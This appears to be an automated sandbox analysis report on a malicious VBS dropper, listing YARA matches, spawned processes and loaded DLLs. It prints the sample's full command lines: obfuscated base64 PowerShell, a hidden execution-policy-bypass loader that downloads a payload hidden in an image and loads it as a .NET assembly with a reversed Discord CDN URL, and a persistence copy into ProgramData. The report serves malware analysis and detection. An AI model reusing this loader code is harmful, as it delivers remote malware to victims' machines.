BvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
        Source: upload.vbsInitial sample: Strings found which are bigger than 50
        Source: Process Memory Space: powershell.exe PID: 4952, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 1360, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: wscript.exe, 00000000.00000003.2033061974.0000021F63DE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034480793.0000021F63DE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yscalls\amsi64_3628.amsi.csvBROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBP&~`[
        Source: classification engineClassification label: mal100.spre.troj.expl.evad.winVBS@11/10@4/2
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vm93m[1].txtJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zzlt0ymo.j2n.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\upload.vbs"
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: upload.vbsVirustotal: Detection: 12%
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\upload.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&821eca10697a0c67df2e67bef74e9882603857ea458ff959daac06cef1e0f42e=mh&de0d0566=si&d6222566=xe?txt.daolpu/2637891303159163421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&821eca10697a0c67df2e67bef74e9882603857ea458ff959daac06cef1e0f42e=mh&de0d0566=si&d6222566=xe?txt.daolpu/2637891303159163421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbsJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
